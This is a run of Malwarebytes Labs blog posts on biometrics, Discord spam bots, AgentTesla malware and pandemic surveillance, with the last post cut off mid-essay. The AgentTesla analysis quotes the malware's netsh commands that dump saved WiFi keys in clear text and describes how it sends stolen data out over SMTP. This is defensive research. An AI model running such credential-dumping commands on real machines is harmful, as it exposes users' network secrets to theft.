Techie Feeds

The passwordless present: Will biometrics replace passwords forever?

Malwarebytes - Tue, 04/21/2020 - 15:00

When it comes to securing your sensitive, personally identifiable information against criminals who can engineer countless ways to snatch it from under your nose, experts have long recommended the use of strong, complex passwords. Using long passphrases with combinations of numbers, letters, and symbols that cannot be easily guessed has been the de facto security guidance for more than 20 years. But does it stand up to scrutiny?

A short and easy-to-remember password is typically preferred by users because of convenience, especially since they average more than 27 different online accounts for which credentials are necessary. However, such a password has low entropy, making it easy to guess or brute force by hackers.

If we factor in the consistent use of a single low-entropy password across all online accounts, despite repeated warnings, then we have a crisis on our hands—especially because remembering 27 unique, complex passwords, PIN codes, and answers to security questions is likely overwhelming for most users.

Instead of faulty and forgettable passwords, tech developers are now pushing to replace them with is something that all human beings have: ourselves.

Bits of ourselves, to be exact. Dear reader, let’s talk biometrics.

Biometrics then and now

Biometrics—or the use of our unique physiological traits to identify and/or verify our identities—has been around for much longer than our computing devices. Handprints, which are found in caves that are thousands of years old, are considered one of the earliest forms of physiological biometric modality. Portuguese historian and explorer João de Barros recorded in his writings that 14th century Chinese merchants used their fingerprints to finalize transaction deals, and that Chinese parents used fingerprints and footprints to differentiate their children from one another.

Hands down, human beings are the best biometric readers—it’s innate in all of us. Studying someone’s facial features, height, weight, or notable body markings, for example, is one of the most basic and earliest means of identifying unfamiliar individuals without knowing or asking for their name. Recognizing familiar faces among a sea of strangers is a form of biometrics, as is meeting new people or determining which person out of a lineup committed a certain crime.

As the population boomed, the process of telling one human being from another became much more challenging. Listing facial features and body markings were no longer enough to accurately track individual identities at the macro level. Therefore, we developed sciences (anthropometry, from which biometrics stems), systems (the Henry Classification System), and technologies to aid us in this nascent pursuit. Biometrics didn’t really become “a thing” until the 1960’s—the same era of the emergence of computer systems.

Today, many biometric modalities are in place for identification, classification, education, and, yes, data protection. These include fingerprints, voice recognition, iris scanning, and facial recognition. Many of us are familiar with these modalities and use them to access our data and devices every day. 

Are they the answer to the password problem? Let’s look at some of these biometrics modalities, where they are normally used, how widely adopted and accepted they are, and some of the security and privacy concerns surrounding them.

Fingerprint scanning/recognition

Fingerprint scanning is perhaps the most common, widely-used, and accepted form of biometric modality. Historically, fingerprints—and in some cases, full handprints—were used as a means to denote ownership (as we’ve seen in cave paintings) and to prevent impersonation and the repudiation of contracts (as what Sir William Herschel did when he was part of the Indian Civil Service in the 1850’s).

Fingerprint and handprint samples taken by William Herschel as part of “The Beginnings of Finger-printing”

Initially, only those in law enforcement could collect and use fingerprints to identify or verify individuals. Today, billions of people around the world are carrying a fingerprint scanner as part of their smartphone devices or smart payment cards.

While fingerprint scanning is convenient, easy-to-use, and has fairly high accuracy (with the exception of the elderly, as skin elasticity decreases with age), it can be circumvented—and white hat hackers have proven this time and time again.

When Apple first introduced TouchID, its then-flagship feature on the 2013 iPhone 5S, the Chaos Computer Club (CCC) from Germany bypassed it a day after its reveal. A similar incident happened in 2019, when Samsung debuted the Galaxy S10. Security researchers from Tencent even demonstrated that any fingerprint-locked smartphone can be hacked, whether they’re using capacitive, optical, or ultrasonic technologies.

“We hope that this finally puts to rest the illusions people have about fingerprint biometrics,” said Frank Rieger, spokesperson of the CCC, after the group defeated the TouchID. “It is plain stupid to use something that you can’t change and that you leave everywhere every day as a security token.”

Voice recognition

Otherwise known as speaker recognition or speech recognition, voice recognition is a biometric modality that, at base level, recognizes sound. However, in recognizing sound, this modality must also measure complex physiological components—the physical size, shape, and health of a person’s vocal chords, lips, teeth, tongue, and mouth cavity. In addition, voice recognition tracks behavioral components—the accent, pitch, tone, talking pace, and emotional state of the speaker, to name a few.

There are two variants of voice recognition: speaker dependent and speaker independent.

Voice recognition is used today in computer operating systems, as well as in mobile and IoT devices for command and search functionality: Siri, Alexa, and other digital assistants fit this profile. There are also software programs and apps, such as translation and transcription services, reading assistance, and educational programs designed with voice recognition, too.

There are currently two variants of voice recognition used today: speaker dependent and speaker independent. Speaker dependent voice recognition requires training on a user’s voice. It needs to be accustomed to the user’s accent and tone before recognizing what was said. This is the type that is used to identify and verify user identities. Banks, tax offices, and other services have bought into the notion of using voice for customers to access their sensitive financial data. The caveat here is that only one person can use this system at a time.

Speech independent voice recognition, on the other hand, doesn’t need training and recognizes input from multiple users. Instead, it is programmed to recognize and act on certain words and phrases. Examples of speaker independent voice recognition technology are the aforementioned virtual assistants, such as Windows’ Cortana, and automated telephone interfaces.

But voice recognition has its downsides, too. While it has improved in accuracy by leaps and bounds over the last 10 years, there are still some issues to solve, especially for women and people of color. Like fingerprint scanning, voice recognition is also susceptible to spoofing. Alternatively, it’s easy to taint the quality of a voice recording with a poor microphone or background noise that may be difficult to avoid.

To prove that using voice to authenticate for account access is an insufficient method, researchers from Salesforce were able to break voice authentication at Black Hat 2018 using voice synthesis, a piece of technology that can creates life-like human voices, and machine learning. They also found that the synthesized voice’s quality only needed to be good enough to do the trick.

“In our case, we only focused on using text-to-speech to bypass voice authentication. So, we really do not care about the quality of our audio,” said John Seymour, one of the researchers. “It could sound like garbage to a human as long as it bypasses the speech APIs.”

All this, and we haven’t even talked about voice deepfakes yet. Imagine fraudsters having the ability to pose as anyone they want using artificial intelligence and a five second recording of their voice. As applicable as voice recognition is as a technology, it’s perhaps the weakest form of biometric identity verification.

Iris scanning or iris recognition

Advocates of iris scanning claim that iris images are quicker and more reliable than fingerprint scanning as a means of identification, as irises are less likely to be altered or obscured than fingerprints.

Sample iris pattern image. The bit stream (top left) was extracted based on this particular eye’s lines and colors. This is then used to compare with other patterns in a database.

Iris scanning is usually conducted with an invisible infrared light that passes over the iris wherein unique patterns and colors are read, analyzed, and digitized for comparison to a database of stored iris templates either for identification or verification.

Unlike fingerprint scanning, which requires a finger to be pressed against a reader, iris scanning can be done both within close range and from afar, as well as standing still and on-the-move. These capabilities raise significant privacy concerns, as individuals and groups of people can be surreptitiously scanned and captured without their knowledge or consent.

There’s an element of security concern with iris scanning as well: Third parties normally store these templates, and we have no idea how iris templates—or all biometric templates—are stored, secured, and shared. Furthermore, scanning the irises of children under 4 years old generally produces scans of inferior quality compared to their adult counterparts.

Iris scanners, especially those that market themselves as airtight or unhackable, haven’t escaped cybercriminals’ radar. In fact, such claims often fuel their motivation to prove the technology wrong. In 2019, eyeDisk, the purported “unhackable USB flash drive,” was hacked by white hat hackers at PenTest Partners. After making a splash breaking Apple’s TouchID in 2013, the CCC hacked Samsung’s “ultra secure” iris scanner for the Galaxy S8 four years later.

“The security risk to the user from iris recognition is even bigger than with fingerprints as we expose our irises a lot,” said Dirk Engling, a CCC spokesperson. “Under some circumstances, a high-resolution picture from the Internet is sufficient to capture an iris.”

Facial recognition

This biometric modality has been all the rage over the last five years. Facial recognition systems analyze images or video of the human face by mapping its features and comparing them against a database of known faces. Facial recognition can be used to grant access to accounts and devices that are typically locked by other means, such as a PIN, password, or other form of biometric. It can be used to tag photos on social media or optimize image search results. And it’s often used in surveillance, whether to prevent retail crime or help police officers identify criminals.

As with iris scanners, a concern of security and privacy advocates is the ability of facial recognition technology to be used in combination with public (or hidden) cameras that don’t require knowledge or consent from users. Combine this with lack of federal regulation, and you once again have an example of technology that has raced far ahead of our ability to define its ethical use. Accuracy is another point of contention, and multiple studies have backed up its imprecision, especially when identifying people of color.

Private corporations, such as Apple, Google, and Facebook have developed facial recognition technology for identification and authentication purposes, while governments and law enforcement implement it in surveillance programs. However, citizens—the target of this technology—have both tentatively embraced facial recognition as a password replacement and rallied against its Big Brother application via government monitoring.

When talking about the use of facial recognition technology for government surveillance, China is perhaps the top country that comes to mind. To date, China has at least 170 million CCTV cameras—and this number is expected to increase by almost threefold by 2021.

With this biometric modality being used at universities, shopping malls, and even public toilets (to prevent people from taking too many tissues), surveys show Chinese citizens are wary of the data being collected. Meanwhile, the facial recognition industry in China has been the target of US sanctions for violations of human rights.

China is one of the top five countries named in the “State Enemies of the Internet” list, which was published by Reporters Without Borders in 2013.

“AI and facial recognition technology are only growing and they can be powerful and helpful tools when used correctly, but can also cause harm with privacy and security issues,” wrote Nicole Martin in Forbes. “Lawmakers will have to balance this and determine when and how facial technology will be utilized and monitor the use, or in some cases abuse, of the technology.”

Behavioral biometrics

Otherwise known as behaviometrics, this modality involves the reading of measurable behavioral patterns for the purpose of recognizing or verifying a person’s identity. Unlike other biometrics mentioned in this article, which are measured in a quick, one-time scan (static biometrics), behavioral biometrics is built around continuous monitoring and verification of traits and micro-habits.

Gait recognition, or gait analysis, is a popular example of behavioral biometrics.

This could mean, for example, that from the time you open your banking app to the time you have finished using it, your identity has been checked and re-checked multiple times, ensuring your bank that you still are who you claim you are for the entire time. The bonus? The process is frictionless, so users don’t realize the analysis is happening in the background.

Private institutions have taken notice of behavioral biometrics—and the technology and systems behind this modality—because it offers a multitude of benefits. It can be tailored according to an organization’s needs. It’s efficient and can produce results in real time. And it’s secure, since biometric data of this kind is difficult to steal or replicate. The data retrieved from users is also highly accurate.

Like any other biometric modality, using behavioral biometrics brings up privacy concerns. However, the data collected by a behavioral biometric application is already being collected by device or network operators, which is recognized by standard privacy laws. Another plus for privacy advocates: Behavioral data is not defined as personally identifiable, although it’s being considered for regulation so that users are not targeted by advertisers.

While voice recognition (which we mentioned above), keystroke dynamics, and signature analysis are all under the umbrella of behavior biometrics, take note that organizations that employ a behavioral biometric scheme do not use these modalities.

Biometrics vs. passwords

At face value, any of the biometric modalities available today might appear to be superior to passwords. After all, one could argue that it’s easy for numeric and alphanumeric passwords to be stolen or hacked. Just look at the number of corporate breaches and millions of affected users bombarded by scams, phishing campaigns, and identity theft. Meanwhile, theft of biometric data has not yet happened at this scale (to our knowledge).

While this argument may have some merit, remember that when a password is compromised, it can be easily replaced with another password, ideally one with higher entropy. However, if biometric data is stolen, it’s impossible for a person to change it. This is, perhaps, the top argument against using biometrics.

Because a number of our physiological traits can be publicly observed, recorded, scanned from afar, or readily taken as we leave them everywhere (fingerprints), it is argued that consumer-grade biometrics—without another form of authentication—are no more secure than passwords.

Not only that, but the likelihood of cybercriminals using such data to steal someone’s identity or to commit fraud will increase significantly over time. Biometric data may not (yet) open new banking accounts under your name, but it can be abused to gain access to devices and establishments that have a record of your biometric. Thanks to new “couch-to-plane” schemes several airports are beginning to adapt, stolen biometrics can now put a fraudster on a plane to any destination they wish to go.

What about DNA as passwords?

Using one’s DNA as password is a concept that is far from far-fetched, although not widely-known or used in practice. In a recent paper, authors Madhusudhan R and Shashidhara R have proposed the use of a DNA-based authentication scheme within mobile environments using a Hyper Elliptic Curve Cryptosystem (HECC), allowing for greater security in exchanging information over a radio link. This is not only practical but can also be implemented on resource-constrained mobile devices, the authors say.

This may sound good on paper, but as the idea is still purely theoretical, privacy-conscious users will likely need a lot more convincing before considering to use their own DNA for verification purposes. While DNA may seem like a cool and complicated way to secure our sensitive information, much like out fingerprints, we leave DNA behind all the time. And, just as we can’t change our fingerprints, our DNA is permanent. Once stolen, we can never use it for verification.

Furthermore, the once promising idea of handing over your DNA to be stored in a giant database in exchange for learning your family’s long-forgotten secrets seems to have lost its charm. This is due to increased awareness among users of the privacy concerns surrounding commercial DNA testing, including how the companies behind them have been known to hand over data to pharmaceutical companies, marketers, and law enforcement. Not to mention, studies have shown that such test results are inaccurate about 40 percent of the time.

With so many concerns, perhaps it’s best to leave the notion of using DNA as your proverbial keys to the kingdom behind and instead focus on improving how you create, use, and store passwords instead.

Passwords (for now) are here to stay

As we have seen, biometrics isn’t the end-all, be-all most of us expected. However, this doesn’t mean biometrics cannot be used to secure what you hold dear. When we do use them, they should be part of a multi-authentication scheme—and not a password replacement.

What does that look like in practice? For top level security that solves the issue of having to remember so many complex passwords, store your account credentials in a password manager. Create a complex, long passphrase as the master password. Then, use multi-factor authentication to verify the master password. This might involve sending a passcode to a second device or email address to be entered into the password manager. Or, if you’re an organization willing to invest in biometrics, use a modality such as voice recognition to speak an authentication phrase.

So, are biometrics here to stay? Definitely. But so are passwords.

The post The passwordless present: Will biometrics replace passwords forever? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 13 – 19)

Malwarebytes - Mon, 04/20/2020 - 16:36

Last week on Malwarebytes Labs, we looked at how to avoid Zoom bombing, weighed the risks of surveillance versus pandemics, and dug into a spot of WiFi credential theft.

Other cybersecurity news:
  • Malware creeps back into the home: With a pandemic forcing much of the workforce into remote positions, it’s worth noting that a study found malware on 45 percent of home office networks. (Source: TechTarget)
  • Free shopping scam: Coronavirus fraudsters attempt to cash in on people’s fears with fake free offers at Tesco. (Source: Lincolnshire Live)
  • Browser danger: Researchers tackle a fake browser extension campaign that targets users of Ledger and other plugins. (source: MyCrypto/PhishFort)
  • Phishing for cash: Research shows how phish kit selling is a profitable business. (Source: Help Net Security)
  • Big problem, big bucks: The FTC thinks Americans have lost out to the tune of 13 million dollars thanks to coronavirus scams. (Source: The Register)
  • Facebook tackles bots: A walled off simulation has been created to dig deep into the world of scams and trolls. (Source: The Verge)
  • Apple of my eye: Apple remains the top brand for phishing scammers to target. (Source: CISO Mag)
  • Fake Valorant beta keys: Reports have surfaced of fake tools promising access to upcoming game Valorant’s beta, with horribly predictable results. (Source: CyberScoop)

Stay safe, everyone!

The post A week in security (April 13 – 19) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Discord users tempted by bots offering “free Nitro games”

Malwarebytes - Fri, 04/17/2020 - 18:28

The last few weeks have seen multiple instances of problematic bots appearing in Discord channels. They bring tidings of gifts, but the reality is quite a bit different. Given so many more young kids and teens are at home during the current global lockdown, they may well see this scam bouncing around their chat channels. Worried parents may want to point them in this direction to learn about the warning signs.

What is Discord?

Sorry, teens who’ve been pointed in this direction: You can skip this part. For anyone else who needs it, Discord is a mostly gaming-themed communication platform incorporating text, voice, and video. It’s not to be mixed up with Twitch, which is more geared toward live gaming streams, e-sports competitions, and older recordings of big events.

DIY bots: part of the ecosystem

One of the most interesting features of Discord is how anyone can make their own channel bot. Simply bolt one together, keep the authorization token safe, and invite it into your channel. If you run into a bot you like the look of in someone else’s channel, you can usually invite them back into your own (or somewhere else), but you’ll need to have “manage server permissions” on your account.

You have to do a little due diligence, as things can go wrong if you don’t keep your bot and account locked down. Additionally, the very openness available to build your own bot means people can pretty much make what they like. It’s up to you as a responsible Discord user to keep that in mind before inviting all and sundry into the channel. Not all bots have the best of intentions, as we’re about to find out.

Discord in bot land

Click to enlarge

If you’re minding your business in Discord, you could be sent a direct message similar to the one above. It looks official, calls itself “Twitch,” and goes on to say the following:

Exclusive partnership

We are super happy to announce that Discord has partnered with Twitch to show some love to our super great users! From April 05, 2020 until April 15, 2020 all our users will have access to Nitro Games

You have to invite me to your servers

If there’s one thing people can appreciate in the middle of a global pandemic, it’s freebies. Clicking the blue text will pop open an invite notification:


Click to enlarge

Add bot to: [server selection goes here]

This requires you to have manage server permissions in this server.

It then goes on to give some stats about whatever bot you’re trying to invite. The one above has been active since April 13, 2019, and is used across 1,000 servers so it’s got a fair bit of visibility. As per the above notification, “This application cannot read your messages or send messages as you.”

Sounds good, right? Except there are some holes in the free Nitro games story.

Nitro is a real premium service offered by Discord offering a variety of tools and functions for users. The problem is that the games offered by Nitro were shut down last October due to lack of use. What, exactly then, is being invited into servers?

Spam as a service

Multiple Discord users have reported these bots in the last few days, mostly in relation to spam, nude pic channels, and the occasional potentially dubious download sitting on free file hosting websites. A few folks have mentioned phishing, though we’ve seen no direct links to actual phishes taking place at time of writing.

Another Discord user mentioned if given access, the bot will (amongst other things) ban everyone from the server and delete all channels, but considering the aim of the game here is to spam links and draw additional people in, this would seem to be counterproductive to the main goal of increasing traffic in specific servers.

Examples: Gaming spam

Here’s one server offered up as a link from one of the bots as reported by a user on Twitter:

Click to enlarge

This claims to be an accounts center for the soon-to-be-smash-hit game Valorant, currently in closed Beta. The server owner explains they’d rather give accounts away than sell them to grow their channel, which is consistent with the bots we’ve seen spreading links rather than destroying channels. While they object to “botted invites,” claiming they’ll ban anyone shown to be inviting via bots, they’re also happy to suggest spamming links to grow their channel numbers.

Click to enlarge

Click to enlarge

It’s probably a good idea they’re not selling accounts, because Riot take a dim view of selling; having said that, promoting giveaway Discords doesn’t seem too popular either.

Examples: Discord goes XXX

Before we can stop and ponder our Valorant account invite frenzy, a new private message has arrived from a second bot. It looks the same as the last bogus Nitro invite, but with a specific addition:

You’ve been invited to join a server: JOIN = FREE DISCORD NITRO AND NUDES

Nudes? Well, that’s a twist.

Click to enlarge

This is a particularly busy location, with no fewer than 15,522 members and roughly 3,000 people online. The setup is quite locked down: There’s no content available unless you work for it, by virtue of sending invites to as many people as possible.

Click to enlarge

The Read Me essentially says little beyond “Invite people to get nudes.”

Click to enlarge

Elsewhere it promotes a “nudes” Twitter profile, with the promise of videos for retweets. The account, in keeping with the general sense of lockdown, has no nudity on it.

Click to enlarge

As you can guess, these bots are persistent. Simply lingering in a server can result in a procession of invites to your account.

Click to enlarge

We were sent to a variety of locations during testing, including some which could have been about films and television or pornography, or both, but in most cases, it was hard to say, as almost every place we landed locks content down.

This makes sense for the people running these channels: If everyone was open from the get-go, there’d be no desire from the people visiting to go spamming links in the dash to get some freebies.

Bots on parade

We didn’t see a single place linked from any of these bots that mentioned free Discord Nitro—it’s abandoned entirely upon entry. Visitors probably have no reason to question otherwise, and so will go off to do their free promotional duties. Again, while it’s entirely possible bots out there are wiping out people’s communities, during testing all we saw in relation to the supposed Nitro spam bots was a method for channel promotion.

If you have server permissions, you should think carefully about which bots you allow into your server. There are no free games, but there is a whole lot of spam on the horizon if you’re not paying attention.

The post Discord users tempted by bots offering “free Nitro games” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New AgentTesla variant steals WiFi credentials

Malwarebytes - Thu, 04/16/2020 - 15:55

AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. The actor behind this malware is constantly maintaining it by adding new modules. One of the new modules that has been added to this malware is the capability to steal WiFi profiles.

AgentTesla was first seen in 2014, and has been frequently used by cybercriminals in various malicious campaigns since. During the months of March and April 2020, it was actively distributed through spam campaigns in different formats, such as ZIP, CAB, MSI, IMG files, and Office documents.

Newer variants of AgentTesla seen in the wild have the capability to collect information about a victim’s WiFi profile, possibly to use it as a way to spread onto other machines. In this blog, we review how this new feature works.

Technical analysis

The variant we analyzed was written in .Net. It has an executable embedded as an image resource, which is extracted and executed at run-time (Figure 1).

Figure 1. Extract and execute the payload.

This executable (ReZer0V2) also has a resource that is encrypted. After doing several anti-debugging, anti-sandboxing, and anti-virtualization checks, the executable decrypts and injects the content of the resource into itself (Figure 2).

Figure 2. Decrypt and execute the payload.

The second payload (owEKjMRYkIfjPazjphIDdRoPePVNoulgd) is the main component of AgentTesla that steals credentials from browsers, FTP clients, wireless profiles, and more (Figure 3). The sample is heavily obfuscated to make the analysis more difficult for researchers.

Figure 3. Second payload

To collect wireless profile credentials, a new “netsh” process is created by passing “wlan show profile” as argument (Figure 4). Available WiFi names are then extracted by applying a regex: “All User Profile * :  (?<profile>.*)”, on the stdout output of the process.

Figure 4 Creating netsh process

In the next step for each wireless profile, the following command is executed to extract the profile’s credential: “netsh wlan show profile PRPFILENAME key=clear” (Figure 5).

Figure 5. Extract WiFi credentials String encryption

All the strings used by the malware are encrypted and are decrypted by Rijndael symmetric encryption algorithm in the “<Module>.\u200E” function. This function receives a number as an input and generates three byte arrays containing input to be decrypted, key and IV (Figure 6).

Figure 6. \u200E function snippet

For example, in Figure 5, “119216” is decrypted into “wlan show profile name=” and “119196” is decrypted into “key=clear”.

In addition to WiFi profiles, the executable collects extensive information about the system, including FTP clients, browsers, file downloaders, and machine info (username, computer name, OS name, CPU architecture, RAM) and adds them to a list (Figure 7).

Figure 7. List of collected info

Collected information forms the body section of a SMTP message in html format (Figure 8):

Figure 8 Collected data in html format in message body

Note: If the final list has less than three elements, it won’t generate a SMTP message. If everything checks out, a message is finally sent via smtp.yandex.com, with SSL enabled (Figure 9):

Figure 9. Build Smtp message

The following diagram shows the whole process explained above from extraction of first payload from the image resource to exfiltration of the stolen information over SMTP:

Figure 10. Process diagram Popular stealer looking to expand

Since AgentTesla added the WiFi-stealing feature, we believe the threat actors may be considering using WiFi as a mechanism for spread, similar to what was observed with Emotet. Another possibility is using the WiFi profile to set the stage for future attacks.

Either way, Malwarebytes users were already protected from this new variant of AgentTesla through our real-time protection technology.

Indicators of compromise

AgentTesla samples:

91b711812867b39537a2cd81bb1ab10315ac321a1c68e316bf4fa84badbc09b
dd4a43b0b8a68db65b00fad99519539e2a05a3892f03b869d58ee15fdf5aa044
27939b70928b285655c863fa26efded96bface9db46f35ba39d2a1295424c07b

First payload:

249a503263717051d62a6d65a5040cf408517dd22f9021e5f8978a819b18063b

Second payload: 

63393b114ebe2e18d888d982c5ee11563a193d9da3083d84a611384bc748b1b0

The post New AgentTesla variant steals WiFi credentials appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mass surveillance alone will not save us from coronavirus

Malwarebytes - Wed, 04/15/2020 - 18:05

As the pattern-shattering truth of our new lives drains heavy—as coronavirus rends routines, raids our wellbeing, and whiplashes us between anxiety and fear—we should not look to mass digital surveillance to bring us back to normal.

Already, governments have cast vast digital nets. South Koreans are tracked through GPS location history, credit card transactions, and surveillance camera footage. Israelis learned last month that their mobile device locations were surreptitiously collected for years. Now, the government rummages through this enormous database in broad daylight, this time to track the spread of COVID-19. Russians cannot leave home in some regions without scanning QR codes that restrict their time spent outside—three hours for grocery shopping, one hour to walk the dog, half that to take out the trash.

Privacy advocates around the world have sounded the alarm. This month, more than 100 civil and digital rights organizations urged that any government’s coronavirus-targeted surveillance mechanisms respect human rights. The groups, which included Privacy International, Human Rights Watch, Open Rights Group, and the Chilean nonprofit Derechos Digitales, wrote in a joint letter:

“Technology can and should play an important role during this effort to save lives, such as to spread public health messages and increase access to health care. However, an increase in state digital surveillance powers, such as obtaining access to mobile phone location data, threatens privacy, freedom of expression and freedom of association, in ways that could violate rights and degrade trust in public authorities – undermining the effectiveness of any public health response.”

The groups are right to worry.

Particularly in the United States, our country’s history of emergency-enabled surveillance has failed to respect Americans’ right to privacy and to provide measurable, increased security. Not only did rapid surveillance authorization in the US permit the collection of, at one point in time, nearly every American’s call detail records, it also created an unwieldy government program that two decades later became ineffective, economically costly, and repeatedly noncompliant with the law.

Further, some of the current technology tracking proposals—including Apple and Google’s newly-announced Bluetooth capabilities—either lack the evidence to prove effective or require a degree of mass adoption that no country has proved possible. Other private proposals come from untrusted actors, too.

Finally, the tech-focused solutions cannot alone fill severe physical gaps, including lacking personal protective equipment for medical professionals, non-existent universal testing, and a potentially fatal selection of intensive care unit beds left to survive a country-wide outbreak.

We understand how today feels. In less than one month, the world has emptied. Churches, classrooms, theaters, and restaurants lay vacant, sometimes shuttered by wooden planks fastened over doorways. We grieve the loss of family and friends, of 17 million American jobs and the healthcare benefits they provided, of national, in-person support networks displaced into cyberspace, where the type of vulnerability meant for a physical room is now thrust online.

For a seemingly endless time at home, we curl and wait, emptied all the same.

But mass, digital surveillance alone will not make us whole.

Governments expand surveillance to track coronavirus

First detected in late 2019 in the Hubei province of China, COVID-19 has now spread across every continent except Antarctica.

To limit the spread of the virus and to prevent overburdened healthcare systems, governments imposed a variety of physical restrictions. California closed all non-essential businesses, Ireland restricted outdoor exercise to 1.2 miles away from the home, El Salvador placed 30-day quarantines on El Salvadorians entering the country from abroad, and Tunisia imposed a nightly 6:00 p.m. – 6:00 a.m. curfew.

A handful of governments took digital action, vacuuming up citizens’ cell phone data, sometimes including their rough location history.  

Last month, Israel unbuttoned a once-secret surveillance program, allowing it to reach into Israelis’ mobile phones not to provide counter-terrorism measures—as previously reserved—but to track the spread of COVID-19. The government plans to use cell phone location data that it had been privately collecting from telecommunications providers to send text messages to device owners who potentially come into contact with known coronavirus carriers. According to The New York Times, the parliamentary subcommittee meant to approve the program’s loosened restrictions never actually voted.

The Lombardy region of Italy—which, until recently, suffered the largest coronavirus swell outside of China—is working with a major telecommunications company to analyze reportedly anonymized cell phone location data to understand whether physical lockdown measures are proving effective at fighting the virus. The Austrian government is doing the same. Similarly, the Pakistani government is relying on provider-supplied location information to send targeted SMS messages to anyone who has come into close, physical contact with confirmed coronavirus patients. The program can only be as effective as it is large, requiring data on massive swaths of the country’s population.

In Singapore, the country’s government publishes grossly detailed information about coronavirus patients on its Ministry of Health public website. Ages, workplaces, workplace addresses, travel history, hospital locations, and residential streets can all be found with a simple click.

Singapore’s coronavirus detection strategy also included a separate, key component.

Last month, the government rolled out a new, voluntary mobile app for citizens to download called TraceTogether. The app relies on Bluetooth signals to detect when a confirmed coronavirus patient comes into close physical proximity with device owners using the same app. It is essentially a high-tech approach to the low-tech detective work of “contact tracing,” in which medical experts interview those with infectious illnesses and determine who they spoke to, what locations they visited, and what activities they engaged in for several days before presenting symptoms.

These examples of increased government surveillance and tracking are far from exceptional.

According to a Privacy International analysis, at least 23 countries have deployed some form of telecommunications tracking to limit the spread of coronavirus, while 14 countries are developing or have already developed their own mobile apps, including Brazil and Iceland, along with Germany and Croatia, which are both trying to make apps that are GDPR-compliant.

While some countries have relied on telecommunications providers to supply data, others are working with far more questionable private actors.

Rapid surveillance demands rapid, shaky infrastructure

Last month, the push to digitally track the spread of coronavirus came not just from governments, but from companies that build potentially privacy-invasive technology.

Last week, Apple and Google announced a joint effort to provide Bluetooth contact tracing capabilities between the billions of iPhone and Android devices in the world.

The two companies promised to update their devices so that public health experts could develop mobile apps that allow users to voluntarily identify if they have tested positive for coronavirus. If a confirmed coronavirus app user comes into close enough contact with non-infected app users, those latter users could be notified about potential infection, whether they own an iPhone or Android.

Both Apple and Google promised a privacy-protective approach. App users will not have their locations tracked, and their identities will remain inaccessible by Apple, Google, and governments. Further, devices will automatically change users’ identifiers every 15 minutes, a step towards preventing identification of device owners. Data that is processed on devices will never leave a device unless a user chooses to share it.  

In terms of privacy protection, Apple and Google’s approach is one of the better options today.

According to Bloomberg, the Israeli firm NSO Group pitched a variety of governments across the world about a new tool that can allegedly track the spread of coronavirus. As of mid-March, about one dozen governments began testing the technology.

A follow-on investigation by VICE revealed how the new tool, codenamed “Fleming,” actually works:

“Fleming displays the data on what looks like an intuitive user interface that lets analysts track where people go, who they meet, for how long, and where. All this data is displayed on heat maps that can be filtered depending on what the analyst wants to know. For example, analysts can filter the movements of a certain patient by their last location or whether they visited any meeting places like public squares or office buildings. With the goal of protecting people’s privacy, the tool tracks citizens by assigning them random IDs, which the government—when needed—can de-anonymize[.]”

These are dangerous, invasive powers for any government to use against its citizens. The privacy concerns only grow when looking at NSO Group’s recent history. In 2018, the company was sued over allegations that it used its powerful spyware technology to help the Saudi Arabian government spy on and plot the murder of former Washington Post writer and Saudi dissident Jamal Khashoggi. Last year, NSO Group was hit with a major lawsuit from Facebook, alleging that the company sent malware to more than 1,400 WhatsApp users, who included journalists, human rights activists, and government officials.  

The questionable private-public partnerships don’t stop there.

According to The Wall Street Journal, the facial recognition startup Clearview AI—which claims to have the largest database of public digital likenesses—is working with US state agencies to track those who tested positive for coronavirus.

The New York-based startup has repeatedly boasted about its technology, saying previously that it helped the New York Police Department quickly identify a terrorism suspect. But when Buzzfeed News asked the police department about that claim, it denied that Clearview participated in the case.

Further, according to a Huffington Post investigation, Clearview’s history involves coordination with far-right extremists, one of whom marched in the “Unite the Right” rally in Charlottesville, another who promoted debunked conspiracy theories online, and another who is an avowed Neo-Nazi. One early adviser to the startup once viewed its facial recognition technology as a way to “identify every illegal alien in the country.”

Though Clearview told The Huffington Post that it separated itself from these extremists, its founder Hoan Ton-That appears unequipped to grapple with the broader privacy questions his technology invites. When interviewed earlier this year by The New York Times, Ton-That looked flat-footed in the face of obvious questions about the ability to spy on nearly any person with an online presence. As reporter Kashmir Hill wrote:

“Even if Clearview doesn’t make its app publicly available, a copycat company might, now that the taboo is broken. Searching someone by face could become as easy as Googling a name. Strangers would be able to listen in on sensitive conversations, take photos of the participants and know personal secrets. Someone walking down the street would be immediately identifiable—and his or her home address would be only a few clicks away. It would herald the end of public anonymity.

Asked about the implications of bringing such a power into the world, Mr. Ton-That seemed taken aback.

“I have to think about that,” he said. “Our belief is that this is the best use of the technology.”

One company’s beliefs about how to “best” use invasive technology is too low a bar for us to build a surveillance mechanism upon.

Should we deploy mass surveillance?

Amidst the current health crisis, multiple digital rights and privacy organizations have tried to answer the question of whether governments should deploy mass surveillance to battle coronavirus. What has emerged, rather than wholesale approvals or objections to individual surveillance programs across the world, is a framework to evaluate incoming programs.

According to Privacy International and more than 100 similar groups, government surveillance to fight coronavirus must be necessary and proportionate, must only continue for as long as the pandemic, must only be used to respond to the pandemic, must account for potential discrimination caused by artificial intelligence technologies, and must allow individuals to challenge any data collection, aggregation, retention, and use, among other restrictions.

Electronic Frontier Foundation, which did not sign Privacy International’s letter, published a somewhat similar list of surveillance restrictions, and boiled down its evaluation even further to a simple, three-question rubric:  

  • First, has the government shown its surveillance would be effective at solving the problem?
  • Second, if the government shows efficacy, we ask: Would the surveillance do too much harm to our freedoms?
  • Third, if the government shows efficacy, and the harm to our freedoms is not excessive, we ask: Are there sufficient guardrails around the surveillance? (Which the organization detailed here.)

We do not claim keener insight than our digital privacy peers. In fact, much of our research relies on theirs. But by focusing on the types of surveillance installed currently, and past surveillance installed years ago, we err cautiously against any mass surveillance regime developed specifically to track and limit the spread of coronavirus.

Flatly, the rapid deployment of mass surveillance to protect the public has rarely­, if ever, worked as intended. Mass surveillance has not provably “solved” a crisis, and in the United States, one emergency surveillance regime grew into a bloated, ineffective, noncompliant warship, apparently rudderless today.

We should not take these same risks again.

The lessons of Section 215

On October 4, 2001, less than one month after the US suffered the worst attack on American soil when terrorists felled the World Trade Center towers on September 11, President George W. Bush authorized the National Security Agency to collect certain phone content and metadata without first obtaining warrants.

